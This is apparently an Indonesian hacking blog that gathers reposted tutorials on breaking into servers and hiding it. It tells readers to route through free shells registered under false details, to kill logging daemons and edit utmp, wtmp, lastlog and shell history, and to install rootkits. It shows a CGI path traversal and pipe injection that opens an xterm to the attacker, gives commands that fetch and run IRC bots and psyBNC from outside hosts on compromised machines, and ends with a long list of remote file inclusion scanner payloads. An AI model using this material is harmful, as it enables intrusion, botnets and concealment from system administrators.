If you get an error it is most likely to be that the proxy you are trying to connect to isn't up, or that you need to login to the proxy. If all goes well you will get the 3 chained together and have a shell account you are able to connect to. Once you are in your shell account you can link shells together by:
E-mail j00]$ ssh 212.23.53.74
You can get free shells to work with until you get some hacked shells, here is a list of free shell accounts. And please remember to sign up with false information and from a wingate if possible.
SDF (freeshell.org) - http://sdf.lonestar.org
GREX (cyberspace.org) - http://www.grex.org
NYX - http://www.nxy.net
ShellYeah - http://www.shellyeah.org
HOBBITON.org - http://www.hobbiton.org
FreeShells - http://www.freeshells.net
DucTape - http://www.ductape.net
Free.Net.Pl (Polish server) - http://www.free.net.pl
XOX.pl (Polish server) - http://www.xox.pl
IProtection - http://www.iprotection.com
CORONUS - http://www.coronus.com
ODD.org - http://www.odd.org
MARMOSET - http://www.marmoset.net
flame.org - http://www.flame.org
freeshells - http://freeshells.net.pk
LinuxShell - http://www.linuxshell.org
takiweb - http://www.takiweb.com
FreePort - http://freeport.xenos.net
BSDSHELL - http://free.bsdshell.net
ROOTshell.be - http://www.rootshell.be
shellasylum.com - http://www.shellasylum.com
Daforest - http://www.daforest.org
FreedomShell.com - http://www.freedomshell.com
LuxAdmin - http://www.luxadmin.org
shellweb - http://shellweb.net
blekko - http://blekko.net
once you get on your last shell you can compile the exploit, and you should be safe from being tracked. But lets be even more sure and delete the evidence that we were there.
Alright, there are a few things on the server side that all script kiddies need to be aware of. Mostly these are logs that you must delete or edit. The real script kiddies might even use a rootkit to automaticly delete the logs. Although lets assume you aren't that lame. There are two main logging daemons which I will cover, klogd which is the kernel logs, and syslogd which is the system logs. First step is to kill the daemons so they don't log anymore of your actions.
E-mail root]# ps -def | grep syslogd
E-mail root]# kill -9 pid_of_syslogd
in the first line we are finding the pid of the syslogd, in the second we are killing the daemon. You can also use /etc/syslog.pid to find the pid of syslogd.
E-mail root]# ps -def | grep klogd
E-mail root]# kill -9 pid_of_klogd
Same thing happening here with klogd as we did with syslogd.
now that killed the default loggers the script kiddie needs to delete themself from the logs. To find where syslogd puts it's logs check the /etc/syslog.conf file. Of course if you don't care if the admin knows you were there you can delete the logs completely. Lets say you are the lamest of the script kiddies, a defacer, the admin would know that the box has been comprimised since the website was defaced. So there is no point in appending the logs, they would just delete them. The reason we are appending them is so that the admin will not even know a break in has accurd. I'll go over the main reasons people break into a box:
To deface the website. - this is really lame, since it has no point and just damages the system.
To sniff for other network passwords. - there are programs which allow you to sniff other passwords sent from and to the box. If this box is on an ethernet network then you can even sniff packets (which contain passwords) that are destine to any box in that segment.
To mount a DDoS attack. - another lame reason, the admin has a high chance of noticing that you comprimised him once you start sending hundreds of MBs through his connection.
To mount another attack on a box. - this and sniffing is the most commonly used, not lame, reason for exploiting something. Since you now how a rootshell you can mount your attack from this box instead of those crappy freeshells. And you now have control over the logging of the shell.
To get sensitive info. - some corperate boxes have alot of valueable info on them. Credit card databases, source code for software, user/password lists, and other top secret info that a hacker may want to have.
To learn and have fun. - many people do it for the thrill of hacking, and the knowledge you gain. I don't see this as horrible a crime as defacing. as long as you don't destroy anything I don't think this is very bad. Infact some people will even help the admin patch the hole. Still illegal though, and best not to break into anyone's box.
I'll go over the basic log files: utmp, wtmp, lastlog, and .bash_history
These files are usually in /var/log/ but I have heard of them being in /etc/ /usr/bin/ and other places. Since it is different on alot of boxes it is best to just do a find / -iname 'utmp'|find / -iname 'wtmp'|find / -iname 'lastlog'. and also search threw the /usr/ /var/ and /etc/ directories for other logs. Now for the explanation of these 3.
utmp is the log file for who is on the system, I think you can see why this log should be appended. Because you do not want to let anyone know you are in the system. wtmp logs the logins and logouts as well as other info you want to keep away from the admin. Should be appended to show that you never logged in or out. and lastlog is a file which keeps records of all logins. Your shell's history is another file that keeps a log of all the commands you issued, you should look for it in your $ HOME directory and edit it, .sh_history, .history, and .bash_history are the common names. you should only append these log files, not delete them. if you delete them it will be like holding a big sign infront of the admin saying "You've been hacked". Newbie script kiddies often deface and then rm -rf / to be safe. I would avoid this unless you are really freaking out. In this case I would suggest that you never try to exploit a box again. Another way to find log files is to run a script to check for open files (and then manually look at them to determine if they are logs) or do a find for files which have been editted, this command would be: find / -ctime 0 -print
A few popular scripts which can hide your presence from logs include: zap, clear and cloak. Zap will replace your presence in the logs with 0's, clear will clear the logs of your presence, and cloak will replace your presence with different information. acct-cleaner is the only heavily used script in deleting account logging from my experience. Most rootkits have a log cleaning script, and once you installed it logs are not kept of you anyways. If you are on NT the logs are at C:winNTsystem32LogFiles, just delete them, nt admins most likely don't check them or don't know what it means if they are deleted.
One final thing about covering your tracks, I won't go to into detail about this because it would require a tutorial all to itself. I am talking about rootkits. What are rootkits? They are a very widely used tool used to cover your tracks once you get into a box. They will make staying hidden painfree and very easy. What they do is replace the binaries like login, ps, and who to not show your presence, ever. They will allow you to login without a password, without being logged by wtmp or lastlog and without even being in the /etc/passwd file. They also make commands like ps not show your processes, so no one knows what programs you are running. They send out fake reports on netstat, ls, and w so that everything looks the way it normally would, except anything you do is missing. But there are some flaws in rootkits, for one some commands produce strange effects because the binary was not made correctly. They also leave cenzurat (ways to tell that the file is from a rootkit). Only smart/good admins check for rootkits, so this isn't the biggest threat, but it should be concidered. Rootkits that come with a LKM (loadable kernel module) are usually the best as they can pretty much make you totally invisible to all others and most admins wouldn't be able to tell they were comprimised.
In writting this tutorial I have mixed feelings. I do not want more script kiddies out their scanning hundreds of sites for the next exploit. And I don't want my name on any shouts. I rather would like to have people say "mmm, that defacing crap is pretty lame" especially when people with no lives scan for exploits everyday just to get their name on a site for a few minutes. I feel alot of people are learning everything but what they need to know inorder to break into boxes. Maybe this tutorial cut to the chase alittle and helps people with some knowledge see how simple it is and hopefully make them see that getting into a system is not all it's hyped up to be. It is not by any means a full guide, I did not cover alot of things. I hope admins found this tutorial helpful aswell, learning that no matter what site you run you should always keep on top of the latest exploits and patch them. Protect yourself with IDS and try finding holes on your own system (both with vuln scanners and by hand). Also setting up an external box to log is not a bad idea. Admins should have also seen alittle bit into the mind of a script kiddie and learned a few things he does.. this should help you catch one if they break into your systems.
On one final note, defacing is lame. I know many people who have defaced in the past and regret it now. You will be labeled a script kiddie and a lamer for a long, long time
nih tutorialnya gw dapetin dari http://hacking.3xforum.ro/post/244/1/How_To_Deface_A_Website/
Diposting oleh anak nyangkruq di 03.06 0 komentar
Kamis, 22 Oktober 2009
ungkapan & menghapus jejak
Ane liat banyak postingan yang inti pertanyaannya itu2 aja: gimana cara deface ?
Karena itu, ane putuskan utk bikin thread ini, isinya pertanyaan2 yg sering diajukan soal deface, thread ini ane kasi lem supaya gampang terbaca. Okeh, langsung aja dimulai, yg lain mo nambahin silakan.
Q: Deface itu apa ?
A: Deface (bukan device) itu tindakan mengubah sebagian atau seluruh tampilan suatu situs secara ilegal. Biasanya attacker juga menyisipkan pesan2 tertentu di situs yg dia deface.
Q: Trus gimana cara ngedeface ?
A: Cari kelemahan atau bug dari situs korban. Bug itu sendiri juga macam2, dan di sini paling sering dibahas soal SQL injection
Q: Nyari bugnya di mana ?
A: Bug biasanya ditemukan melalui tes penetrasi ke situs korban, pelajari dulu gimana cara web bekerja, pemrogramannya, dan mengapa bug yang bersangkutan bisa terjadi, ntar pasti kejawab sendiri.
Q: Belajar pemrograman web di mana ?
A: Favorit ane: ini, ini, ini, dan ini
Q: Apa itu SQL injection ?
A: SQLi itu metode untuk mengeksekusi query2 SQL tertentu di situs korban, biasanya melalui URL, contohnya untuk membaca username dan password yang disimpan dalam database
Q: Gimana cara mengeksploitasi bug SQLi ?
A: SEARCH SANA !!!
Q: XSS, apalagi tuh ?
A: XSS itu bug yang membuat kode HTML bisa dieksekusi di website korban, contohnya peng-echo-an parameter dari $_GET secara langsung tanpa filter.
Q: Gimana cara mengeksploitasi bug XSS ?
A: SEARCH SEARCH SEARCH !!!
Q: Kalo RFI/LFI ?
A: RFI = Remote File Inclusion, LFI = Local File Inclusion. Intinya, dengan bug ini kita bisa mengeksekusi (include) file lain di suatu web, baik yg local atau yg remote
Q: Cara mengeksploitasinya ?
A: SEARCH
Q: Shell itu apa ?
A: Shell itu sebuah intepretasi yg dipake user untuk berinteraksi dengan suatu sistem. Kalo web shell, shell yg ditulis dalam bahasa pemrograman web (seperti R57, C99, dsb) untuk memudahkan eksplorasi terhadap suatu web yg memliki bug RFI/LFI.
Q: Gimana gw bisa dapetin web shell ?
A: Jelas di sini
Q: Okeh, gw berhasil ngedapetin password, tapi dienkripsi pake MD5, gimana cara decryptnya ?
A: Ane lurusin dikit, MD5 adalah sebuah hash dan gak bisa diencrypt, tapi bisa dicrack. Ada banyak toolnya bertebaran baik yg offline atau yg online, contohnya ini
Q: Gimana cara ngapus jejak ?
A: Coba liat ke sini
Q: Nyari halaman login admin di mana ?
A: Coba tebak2 aja, misalnya admin, login, administrator, dll. Kalo mo pake tools coba Accunetix. Cara lain, liat file robots.txt-nya (contoh: http://www.situs.com/robots.txt)
* Report this post
* Reply with quote
"Menghapus jejak meninggalkanmu..."
Postby bungaputrilanacita on 19 Jan 2009, 04:25
Hehehehe,..mo tanya, ini kaya judul lagunya band apa yach??? ïŠ
Upst,.tapi ada hubungannya loh lagu diatas sama masalah hacking pada mesin *nix, loh..loh..loh..lagu sama hacking,dimana bunga hubungannya???
Okey deyh,daripada bunga dibilang size bajunya L alias Lebai :D , langsung ajah deyh di ulas dikit-dikit.
.log file ??? ini sebuah file yang berisi tentang catatan apapun yang dilakukan oleh siapapun dalam sebuah mesin. Untuk bisa mengakses ini yang dibutuhkan adalah anda sebagai root/SU. File ini bisa dibuka atau diedit dengan cara menggunakan text editor dan hexa editor sesuai dengan jenis/macamnya. Loh kok macamnya??? Emangnya ada berapa macam yang sich log file itu???
Ini macem ato jenis dari dari file log itu, tapi kalo ada kesalahan mohon maaf dan di koreksi yach temen-temen,bunga masih belajar :D
1. .history: mencatat semua hal yang dilakukan oleh user, biasanya tersimpan dalam directory user. Sangat mudah dihapus ato di edit, asalkan kita sebagai SU statusnya.
2. acct ato pact: mencatat semua hal yang dilakukan oleh user, tetapi tidak mencatat program yang dijalankan oleh user, ini hanya catatan harian sebuah mesin, jadi ukuran file bisa bertambah besar setiap harinya. Biasanya terletak pada /var/adm/savacct.
3. access_log: mencatat access file pada www seperti: pemanggilan hostname, remote login, waktu access dan perintah-perintah pada http, digunakan pada NCSA httpd server. Biasanya berupa text biasa, sangat mudah diedit hanya menggunakan text editor.
4. aculog: mencatat pemakaian modem.
5. lastlog: mencatat user yang login,baik yang masuk ato gagal login. Didalemnya terekam IP address dari user tersebut.sangat mudah dihapus,pake coomannd ajah lsg terhapus kok.
6. loginlog: mencatat hanya user yang gagal login biasanya setelah 5 kali percobaan gagal login baru tercatat. Bentuknya hanya file text bisa, jadi sangat mudah dihapus ato diedit.
7. messages: mencatat hasil apapun yang dikeluarkan oleh syslog. Bentuknya hanya file text bisa, jadi sangat mudah dihapus ato diedit.
8. sulog: mencatat apapun yang dilakukan oleh su. Bentuknya hanya file text bisa, jadi sangat mudah dihapus ato diedit.
9. utmp: mencatat siapa saja yang sedang login ato berada dalam sebuah mesin. Biasanya menggunakan command who untuk mengetahui penyusup yang sedang asik-asikan didalam mesin. File ini berekstensi utmpx.
10. wtmp: mencatet user yang login menggunakan ftp,berekstensi wtmpx, dan menggunakan hexaeditor untuk mengeditnya.
11. vold.log: mencatat error pada mesin yang menggunakan media external,contoh cd room, floppy, dsb.
12. xferlog: mencatat penggunaan ftp (hampir sama spt wmtp).
13. syslog:
Setelah kita mengetahui sedikit tentang macam-macamnya lalu kita akan mencoba telusuri lebih dalam lagi,.semua file diatas terangkum dalam sebuah file yang dinamakan syslog. Syslog ini mempunyai daemon yang berguna sebagai “jantungnya†dinamakan syslogd. Sewaktu syslog ini berjalan dia akan menuju file conf yang terletak pada /etc/syslog.conf yang membaca dari tiga buah report yang dikeluarkan oleh:
a. /dev/klog(membaca kernel report)
b. /dev/log(membaca report program yang berjalan pada local mesin)
c. UDP port 514(membaca report program yang berjalan pada network)
So sedikit kita sudah mengetahui tentang file log ini,..tapi…dimanakah file tersebut berada??? Untuk hal yang satu ini tempatnya abstrak alias bisa dipindah-pindah, admin yang topcer biasanya menyembunyikan file ini dalam brangkasnya,..hehehehehhe..gak mungkin lah BungaïŠ, iya gak mungkin dalam brangkas siy, tapi memang diumpetin serapat-rapatnya serahasia hanya admin dan Tuhan yang mengetahuinyaïŠ. Tapi jangan sedih dulu, menurut pengalaman Bunga, Masih banyak admin yang teledor dengan asumsi masih diparkirkan pada tempat defaultnya,â€because secure is not defaultâ€ntu kata hacker inggris, tapi Bunga lupa Nicknya ïŠ.
Tempatnya file log dari pengalaman Bunga:
• /usr/adm
• /var/adm
• /var/log
Sekali lagi ini gak mutlak loh,.kalo mo jelas,datengin ajah adminnya Tanya passnya,Tanya file lognya, terus minta ijin ajah sekalian pake mesinnya,kalo yang ini halal 100%,.hehehehehehe,.becanda :D
Dah ketemu file lognya tapi cara membersihkannya bagaimana yach???masnya ambil kain basah lalu lap ajah monitornya, siapa tau bisa bersih,.hehehehehehe,.becanda lagi ding ïŠ
Caranya pake perintah rm –rf, syntak: command [patch], contoh: rm –rf /var/log/wmtp, ato juga menggunakan text editor sepert vi / nano / pico, cukup hapus baris datanya saja, kurang lebih sama seperti konfigurai dual boot lilo :D
Yach, sekarang kita lanjutkan lagi, tapi dah pada capek yach,.bikin teh, kopi, or susu jangan lupa cemilannya yach, biar tambah semangat,.GO..GO..GO.. (^-^)
Okey sekarang kita mencoba membedah file log untuk mengetahui vulnerbilty pada mesin kita,.sebelumnya, sekali lagi maafkan Bunga jika ada kesalahan, mas, om, mba, tante, kakak, yang lebih senior dan jago Bunga minta ijin,.â€satu guru satu ilmu dilarang saling mengganguâ€,.hehehehehehehe,… :D
Berikut ini contoh kasus pada http://www.c**.co.id, Bunga pernah melakukan forensic pada mesin servernya, web programernya menggunakan script CGI Perl, Servernya diobrak-abrik oleh craker gila, tapi dia agak sembrono dimana dia tidak menghapus track nya pada access_log,(untuk IP nya disamarkan):
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / HTTP/1.0†200 3008
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / A1.jpg HTTP/1.0†200 3456
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / V90.jpg HTTP/1.0†200 6943
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / RG7.jpg HTTP/1.0†200 9854
Penjelasan: Attacker dengan no Ip 10.0.*.**, dia hanya melihat-lihat web ini pada halaman utama dan kejadian ini dicatet pada jam 01:02:45.
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / index.cgi?page=contact.shtml HTTP/1.0†200 309
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / NOW.jpg HTTP/1.0†200 3456
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / index.cgi?page=layanan.shtml HTTP/1.0†200 309
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / 9RG7.jpg HTTP/1.0†200 9854
Penjelasan: Masih sulit apa maksudnya attacker dikarena dia masih melihat-lihat dan mencoba link pada web ini.
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / cgi-bin/ HTTP/1.0†403 272
Penjelasan: Attacker mulai beraksi, dia mencoba mengakses direktory /cgi-bin/ dan hal hasil yang ditemukannya adalah 403, apa siy artinya 403??? forbiden cuy,. ïŠ
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / index.cgi HTTP/1.0†200 3009
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / index.cgi?page=index.cgi HTTP/1.0†200 399
Penjelasan: Attacker melanjutkan serangannya lagi, sekarang dia mengikuti pola link yang telah lihatnya. Peratama ia memasukan http://www.c**.co.id/index.cgi lalu ia mencoba lagi mamasukan http://www.c**.co.id/index.cgi?page=index.cgi.
Nah dari sini si attacker dapat melihat script index.cgi nya, dari mana ia melihatnya??? Yach dari browsernya lah,.scriptnya tampil di browser ïŠ.
Kenapa ini bisa terjadi???
Attacker meneliti index.cgi menerima sebuah nama file sebagai seuatu parameter dan memperlihatkan isi dari file tersebut. Disini attacker menggunakan index.cgi itu sendiri untuk menampilkan source codenya.
Source code:
01: #! /usr/bin/perl
02: # perl script to display a page back as requested by the argument
03:
04: require “../cgi-bin/cgi-lib.plâ€;
05:
06: &ReadParse(*input);
07:
08: $namafile = $input{page};
09: if ($namafile eq “â€) {
10: $namafile = “main.htmlâ€;
11: }
12:
13: print &PrintHeader;
14:
15: $namafile = “ /usr/local/apache/htdocs/†. $namafile;
16: open(FILE, $namafile);
17: while(
18: print $_;
19: }
20: close(file);
Sekarang kita ulas dan pelajari,.bugs nya terdapat pada validasi untuk parameter-parameter yang akan dilewatkan ke script index.cgi. Filename yang dilewatkan sebagai parameter dari url ditangkap sebagai sebuah variabel $namafile pada baris 08, ditambahkan ke path absolut†usr/local/apache/htdocs†pada baris 15, dan ditampilkan pada baris 16.
Berarti,...yups betul,.kita bisa dengan mudah mengambil file dari server web ïŠ
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0†200 786
Penjelasan: Sekarang attacker mencoba mencari password,.Wow... (^-^)
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0†200 1399
10.0.*.** - - [24/Oct/2008:01:02:45 +0530] “GET / index.cgi?page=|xterm+ display+10.0.*.**:0.0+%26| HTTP/1.0†200
Penjelasan: Rupanya ini attacker mengerti tentang unix dan perl, sekarang dia tidak berusaha membuka file dikarenakan dia sekarang menggunakan karakter pipaâ€|†diikuti dengan command-command pilihannya. Dengan demikian, perl membuka kendali filenya yang dapat menerima output standar hasil dari command-command yang dituliskan pada parameter filename. Disini attacker meminta 2 buah request:
http://www.c**.co.id/index.cgi?page=|ls ... ich+xterm|
disini jelas attacker sebenernya mengeksekusi coomand ls –la/ , id, which xterm,.apa yang didapet dari attacker mengeksekusi coomand tersebut???
Yang didapet adalah: menampilkan daftar file pada direktory root dengan perintah ls –la/, mendapatkan id user yang efektif pada proses eksekusi index.cgi dengan perintah id, dan yang terkahir mendapatkan path xtrem biner dari perintah “which xtermâ€.
Request yang kedua:
http://www.c**.co.id/index.cgi?page=|xt ... *:0.0+%26|
attacker menjalankan command “xterm – display 10.0.*.**:0.0&â€ini berarti dia menjalankan window xterm pada mesin attacker. Lalu apa yang dilakukan???yach udah masukin user, trus pass, masuk deyh,. ïŠ.
Dari sini kita dapet mengetahui bugs pada mesin kita dengan melihat log yang ditinggalkan oleh attacker.
Yach,.segitu ajah dari bunga tentang menghapus jejak dan buka-bukaan file log tuk dapet vulnerbilty sebuah mesin.
Semoga ajah tulisan ini bermanfaat untuk kemajuan IT security Indonesia.Mohon dikoreksi lagi para senior ato orang-orang yang jago dalam bidang ini,dikarenakan Bunga masih belajar,. :D
Makacih buat semua orang yang ada didunia dan temen-temen semua di forum,.
Salam hangat
Bungaputrilanacita :D
Diposting oleh anak nyangkruq di 10.11 0 komentar
Cara Praktis membuat bot dan psyBNC di dalnet
untuk dapat membuat bot dan psybNC, kamu harus punya shell yang bagus
lebih bagus lagi kamu pegang akses root....
klu kamu belum punya shell yang bagus dapet di ambil di
http://www.manadocoding.com/forum/viewtopic.php?t=1627
ok sekaran kita mulai caranya ...
==========================
command2 Dasar server Linux dan FreebSD:
1. uname -a;id <<== untuk melihat jenis server dan id
2. /sbin/ifconfig | grep inet<<== untuk melihat ip server
3. find / -type d -perm 777 <<== untuk melihat direktori yg tidak permission denied
4. mkdir <<== untuk membuat direktori baru example: mkdir love
5. ls -alF <<== untuk melihat semua file dalam sebuah direktory
6. wget/lwp-download/curl -f -O <<== untuk mendownload file kita kedalam server
cara membuat bot dari server Linux:
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/acz.tgz
2. cd /var/tmp;tar -zxvf acz.tgz
3. cd /var/tmp;rm -fr acz.tgz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./dssl a.txt atau cd /var/tmp;./eggdrop -m a.txt
cara membuat bot dari server FreeBsd:
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/aczbsd.tgz
2. cd /var/tmp;tar -zxvf aczbsd.tgz
3. cd /var/tmp;rm -fr acz.tgz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./eggdop -m a.txt
cara load psy dari server Linux:
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/AhoK.tar.gz
2. cd /var/tmp;tar -zxvf AhoK.tar.gz
3. cd /var/tmp;rm -fr AhoK.tar.gz
4. cd /var/tmp/AhoK;./config (IDENTD) (PORT)
5. cd /var/tmp/AhoK;./f**k
6. cd /var/tmp/AhoK;./run
kalau uda dirun coba join ke #samudra lalu test portcheck.. example `pc (nomerIP) (PORT)
cara load psy dari server FreeBsd:
1. cd /var/tmp;wget http://www.solsiden.info/psy/samsengpsy.tgz
2. cd /var/tmp;tar zxfv samsengpsy.tgz
3. cd /var/tmp;rm -fr samsengpsy.tgz
4. cd /var/tmp/samseng;./config (IDENTD) (PORT)
5. cd /var/tmp/samseng;./f**k
6. cd /var/tmp/samseng;./run
bot Portcheck, os, ip-to-country, jodoh dan dns, tinggal load aja, untuk server Linux
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/Gufi.tar.gz
2. cd /var/tmp;tar -zxvf Gufi.tar.gz
3. cd /var/tmp rm -fr Gufi.tar.gz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./eggdrop -m a.txt
kalau uda masuk botnya coba test !dns [host] | !ip2c | `pc [host] [port] | !jodoh
bot Portcheck, os, ip-to-country, jodoh dan dns, tinggal load aja, untuk server FreeBsd
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/Gufibsd.tar.gz
2. cd /var/tmp;tar -zxvf Gufibsd.tar.gz
3. cd /var/tmp rm -fr Gufibsd.tar.gz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./eggdrop -m a.txt
kalau uda masuk botnya coba test !dns [host] | !ip2c | `pc [host] [port] | !jodoh
sedikit saran
klu mau buat bot dan psyBNC, jangan terlalu banyak buatnya
dalam 1 shell injeck, soalnya nanti di kill ama dalnet
Diposting oleh anak nyangkruq di 02.11 0 komentar
http://dr-allnetwork.co.cc/?p=28
.scan2 /components/com_joomlalib/standalone/stubjambo.php?baseDir= “/index.php?option=com_easybook”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “/index.php?id=50?
.scan2 /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= “Diese Seite wurde mit der quelloffenen Software CMS Made Simple erstellt.”
.scan2 /members/?INC= “YourWebsitename gives you the best search results and keyword bidding.”
.scan2 /members/?INC= “If You lost password enter Your login:”
.scan2 ////////?cmd&file= “index.php?cmd=10?
.scan2 /include/admin.lib.inc.php?site_path= /list.php?bbs_id=
.scan2 /components/com_joomlalib/standalone/stubjambo.php?baseDir= “option,com_joomlalib”
.scan2 /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath= “/plugins/mygallery/”
.scan2 /skins/advanced/advanced1.php?pluginpath[0]= “/advanced2.php”
.scan2 /admin/auth.php?xcart_dir= “/pages.php?pageid=3? -p 200
.scan2 /admin/auth.php?xcart_dir= “/admin/auth.php?xcart_dir=”
.scan2 /?sourcedir= “/QueryString.php”
.scan2 /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path= “/board.php?board=”
.scan2 ?sourcedir= index.php?sourcedir=
.scan2 /components/com_joomlalib/standalone/stubjambo.php?baseDir= /index.php?option=com_gallery2
.scan2 /bemarket/postscript/postscript.php?p_mode= /bemarket/
.scan2 /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= /index.php?mact= -p 200
.scan2 /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= News,cntnt01,detail,0&cntnt01articleid= -p100
.scan2 /stats.php?dir[func]=&dir[base]= “mygamingladder” “my gaming ladder”
.scan2 /extras/poll/poll.php?file_newsportal= “/post.php?newsgroups=”
.scan2 /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= “com_sitemap”
.scan2 /autoclose.php?subd= “Help Desk Software By Kayako eSupport v3.10.02?
.scan2 /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act= “/board.php?board=”
.scan2 /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act= “/kboard.php?board=notice”
.scan2 /inc/shows.inc.php?cutepath= “Translated by Slaver”
.scan2 /themes/default/index.php?main= “cfagcms” “cfagcms”
.scan2 /themes/default/index.php?main= “cfag cms”
.scan2 /comments.php?id={${include($ddd)}}{${exit()}}&ddd= “poll_ssi.php”
.scan2 /poll/comments.php?id={${include($ddd)}}{${exit()}}&ddd= “/poll_cookie.php”
.scan2 /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “/index.php?option=com_content” xoo
.scan2 /admin.php?include_path= “Powered by Lazarus Guestbook from carbonize.co.uk”
.scan2 /classes/Import_MM.class.php?g_rb_basedir= “PHPRecipeBook”
.scan2 /?sIncPath= “Copyright © 2008 Your Company.”
.scan2 /?sIncPath= “/index.php?members_mode=”
.scan2 /?sIncPath= “/index.php?members_mode=top”
.scan2 /?sIncPath= “index.php?tags_mode=profile”
.scan2 /common/db.php?commonpath= “playing.php”
.scan2 /update/update2.php?lang= photokorn 1.53
.scan2 /index.php?view=page&pagename= “/?view=main&cityid=”
.scan2 /index.php?view=page&pagename= “You have an error in your SQL syntax;”
.scan2 /index.php?view=page&pagename= “/?view=selectcity&targetview=post&cityid=-3&lang=en”
.scan2 /index.php?load= “/index.php?load=home”
.scan2 /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= “/index.php?module=Pagesetter”
.scan2 /index.php?view=page&pagename= “/?view=main&cityid=”
.scan2 /index.php?view=page&pagename= “You have an error in your SQL syntax;”
.scan2 /index.php?view=page&pagename= “/?view=selectcity&targetview=post&cityid=-3&lang=en”
.scan2 /page.php?id= “RCMS-Pro”
.scan2 /page.php?id= “©2005 – 2006 Roosevelt Purification. RGameScript is a free software under GNU/GPL License”
.scan2 /page.php?id= “/index.php?id=cats”
.scan2 /function.inc.php?path= “ACGVclick” “ACGVclick”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx” “MODx”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx Parse Error”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “/index.php?id=5?
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “/index.php?id=1&start=10?
.scan2 /tools/send_reminders.php?noSet=0&includedir= “WebCalendar v1.1.0c-CVS”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “snippets/reflect”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx CMS”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “My MODx Site is powered by MODx Content Management System”
.scan2 /index.php?view=page&pagename= “Buy, sell, trade, date, events… post anything”
.scan2 /index.php?view=page&pagename= “Thank you for stopping by my site. Here you can leave your mark.”
.scan2 /includes/function_core.php?web_root= “Mp3 Rating”
.scan2 /?mosConfig_absolute_path= “Powered by Joomla!”
.scan2 /modules/Forums/admin/admin_words.php?phpbb_root_path= “Hebrew Ver. HebNukeR 2.0 © 2004 by HebNukeR.org. All Rights Reserved”
.scan2 /index.php?option=com_custompages&cpage= Joomla custompages
.scan2 /booth.php?include_path= “/poll_cookie.php”
.scan2 /update/update2.php?lang= “photo foto gallery bilder tauchen wracks galerie”
.scan2 /header.php?base_folder= “Powered by Bab.stats”
.scan2 /tools/send_reminders.php?noSet=0&includedir= WebCalendar v1.0RC3 (11 Mar 2005)
.scan2 /index.php?cmd&file= “index.php?cmd=5?
.scan2 /index.php?cmd&file= “Membre avec photos seulement ?”
.scan2 /index.php?cmd&file= “%22HOME%22+%22%7C%22+%22UPLOAD+YOUR+PHOTO%22+%22%7C%22+%22LATEST+USERS%22+%22%7C%22+%22TOP+10%22+%22%7C%22+%22TOP+GUYS%22+%22%7C%22+%22TOP+GIRLS%22+%22%7C%22+%22CONTACT%22?
.scan2 /index.php?cmd&file= “List Users with Pics only?”
.scan2 /index.php?cmd&file= “So you think you’re HOT?”
.scan2 /contenido/external/frontend/news.php?cfg[path][includes]= Contenido Login
.scan2 /contenido/external/frontend/news.php?cfg[path][includes]= “Contenido Login” “Contenido Login”
.scan2 /clmcpreload.php?CLPATH= “CaLogic” “Calendars”
.scan2 /txt-db-api/txt-db-api.php?API_HOME_DIR= “linkmix” “linkmix” “linkmix”
.scan2 /cms/system/openengine.php?oe_classpath= “/cms/website.php?id=/de/”
.scan2 /modules/Forums/admin/admin_words.php?phpbb_root_path= “Thai Edition by ThaiNuke”
.scan2 index.php?custompluginfile[]= “Sorry, your account does not have access to submit information”
.scan2 include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= /index.php?nwaction=shownews
